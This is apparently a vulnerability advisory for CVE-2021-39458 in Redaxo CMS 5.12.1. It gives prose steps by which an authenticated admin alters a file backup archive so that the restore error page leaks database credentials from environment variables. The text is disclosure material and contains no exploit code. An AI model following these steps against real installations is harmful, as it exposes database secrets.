CVE-2021-39458
Database information leak
- Vendor: Yakamara Media
- Product: Redaxo CMS
- Version: 5.12.1
An authenticated admin user can adding new files to a valid file backup archive of Redaxo CMS to trigger an error page which leaks database credentials in the environment variables
Steps for proof of concept:
- Creating a file backup which contains the media folder i.e.
- adding a new file in the media folder with 7-Zip
- Uploading the backup archive in the import tab and choose the file on "Restore file backup"
- The changed checksum will display the error page
